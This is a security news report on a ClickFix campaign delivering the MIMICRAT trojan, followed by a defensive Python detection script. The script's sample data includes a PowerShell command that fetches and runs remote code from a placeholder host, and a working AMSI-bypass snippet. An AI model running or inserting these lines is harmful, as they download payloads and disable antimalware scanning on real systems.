Security researchers disclosed a ClickFix campaign that abused compromised legitimate websites to deliver a previously undocumented remote access trojan named MIMICRAT earlier this month. The malware supports 22 commands and communicates over HTTPS on port 443.
KEY FACTS
- Incident: Compromised sites served malicious code to deliver a multi-stage lure
- Malware: MIMICRAT is a custom C++ RAT with 22 commands
- Delivery: PowerShell chain drops a Lua-based shellcode loader
- Communication: HTTPS C2 on port 443 using analytics-like HTTP profiles
- Reach: Lure content supports 17 languages and victims span multiple geographies
In a technical analysis Elastic Security Labs said attackers injected malicious JavaScript into a breached BIN validation site to load an externally hosted PHP script that displayed a fake Cloudflare verification page and prompted victims to run a command.
The Run command launched a PowerShell one-liner that fetched a second-stage PowerShell script. That script tampers with Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI), the Windows components that feed PowerShell telemetry and script content to logging and antimalware products, before dropping a Lua-based loader. Blinding both means the later stages run with less chance of being logged or scanned.
The final stage decrypts and executes in-memory shellcode that installs MIMICRAT. The implant supports Windows token impersonation, SOCKS5 tunneling and extensive process and file system control. The campaign's lure text is localized per victim, and the implant's HTTP profiles resemble web analytics traffic, which helps its C2 channel blend into ordinary outbound HTTPS.
Identified victims include a US university and multiple Chinese-speaking users. The campaign shares tactics with other ClickFix activity and the loader pipeline has been observed in chains that culminate in ransomware deployment or data exfiltration. The total number of infections was not disclosed.
WHY IT MATTERS
The chain shows how a compromised third-party site, a social-engineering prompt, multi-stage PowerShell and an in-memory loader combine to sidestep controls that only inspect files on disk. Organizations should review which external scripts and services their web properties and users depend on, enable PowerShell script block logging so second-stage script content is captured, alert on PowerShell spawned from explorer.exe with a download cradle in the command line, and scrutinize outbound HTTPS that imitates analytics traffic. Users should be told that no legitimate verification page asks them to paste a command into the Run dialog.
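As an added example (not code from the report, from Elastic, or from the campaign), the Python below runs the detection logic the chain above calls for over constructed endpoint telemetry: process-creation records for PowerShell launched from explorer.exe with a download cradle, PowerShell script-block text that patches AMSI or ETW, and Win+R history from the RunMRU registry key. Field names follow the Sysmon/Event ID 4104 style and the records are constructed; the pattern lists are common tradecraft assumed for the example, not indicators published in the report.

```python
import re

# Stage 1 markers: a download cradle typed into the Run dialog. These tokens are
# common PowerShell tradecraft, assumed for this example, not IOCs from the report.
CRADLE_PATTERNS = [
    r"\biex\b", r"invoke-expression", r"downloadstring", r"invoke-webrequest",
    r"\biwr\b", r"\birm\b", r"invoke-restmethod", r"-w(indowstyle)?\s+hidden",
    r"-enc(odedcommand)?\s", r"-nop\b", r"frombase64string",
]

# Stage 2 markers: AMSI/ETW patching as seen in public bypass snippets
# (again assumed, not taken from the report's second-stage script).
TAMPER_PATTERNS = [
    r"amsiscanbuffer", r"amsiinitfailed", r"amsiutils", r"amsicontext",
    r"etweventwrite", r"ntdll\.dll.*etw", r"\[ref\]\.assembly\.gettype\(",
]


def _hits(text, patterns):
    """Return the patterns that match text (case-insensitive)."""
    t = text.lower()
    return [p for p in patterns if re.search(p, t)]


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def detect_process_event(ev):
    """Flag PowerShell spawned by explorer.exe (Run dialog) with a cradle."""
    if _basename(ev.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
        return None
    hits = _hits(ev.get("CommandLine", ""), CRADLE_PATTERNS)
    if _basename(ev.get("ParentImage", "")) == "explorer.exe" and hits:
        return {"stage": "run-dialog-cradle", "pid": ev["ProcessId"], "hits": hits}
    return None


def detect_scriptblock(ev):
    """Flag PowerShell script-block text (Event ID 4104) that patches AMSI/ETW."""
    hits = _hits(ev.get("ScriptBlockText", ""), TAMPER_PATTERNS)
    if hits:
        return {"stage": "amsi-etw-tamper", "pid": ev["ProcessId"], "hits": hits}
    return None


def detect_runmru(lines):
    """Flag Win+R history (HKCU\\...\\Explorer\\RunMRU) entries that ran a cradle.

    Each value is stored as '<command>\\1'; the lines mimic 'reg query' output.
    """
    out = []
    for line in lines:
        m = re.match(r"\s*(\w)\s+REG_SZ\s+(.*?)\\1\s*$", line)
        if not m:
            continue
        hits = _hits(m.group(2), CRADLE_PATTERNS)
        if hits:
            out.append({"value": m.group(1), "command": m.group(2), "hits": hits})
    return out


def hunt(events):
    """Run the per-event detectors; process events carry 'Image', 4104 events don't."""
    findings = []
    for ev in events:
        f = detect_process_event(ev) if "Image" in ev else detect_scriptblock(ev)
        if f:
            findings.append(f)
    return findings


def correlate(findings):
    """PIDs seen in both stages: a cradle launch that then blinded AMSI/ETW."""
    by_pid = {}
    for f in findings:
        by_pid.setdefault(f["pid"], set()).add(f["stage"])
    return sorted(p for p, s in by_pid.items() if len(s) == 2)


# Constructed sample telemetry (not real logs). PID 4321 is the lure chain;
# the backup.exe-launched script and the Get-ChildItem block are benign noise.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe", "ProcessId": 1234},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "ProcessId": 4321,
     "CommandLine": 'powershell -w hidden -nop -c "iex (iwr https://example.invalid/verify).Content"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\backup.exe", "ProcessId": 5555,
     "CommandLine": r"powershell -File C:\scripts\nightly.ps1"},
    {"ScriptBlockText": "$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');"
                        "$a.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)",
     "ProcessId": 4321},
    {"ScriptBlockText": r"Get-ChildItem C:\Users | Measure-Object", "ProcessId": 6000},
]

# Constructed 'reg query HKCU\...\Explorer\RunMRU' style output.
SAMPLE_RUNMRU = [
    r"    a    REG_SZ    notepad\1",
    r"    b    REG_SZ    powershell -w hidden -nop -c iex (iwr https://example.invalid/verify).Content\1",
    r"    MRUList    REG_SZ    ba",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f)
    print("correlated PIDs:", correlate(hunt(SAMPLE_EVENTS)))
    print("RunMRU:", detect_runmru(SAMPLE_RUNMRU))
```

The correlation step is the useful part: a cradle launched from explorer.exe alone is noisy (admins do paste one-liners), and an AMSI/ETW patch alone may come from a red-team tool, but the same process doing both in sequence is the ClickFix chain as described. The RunMRU check is for forensics after the fact, since that key survives even when the PowerShell process and its logs are gone.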

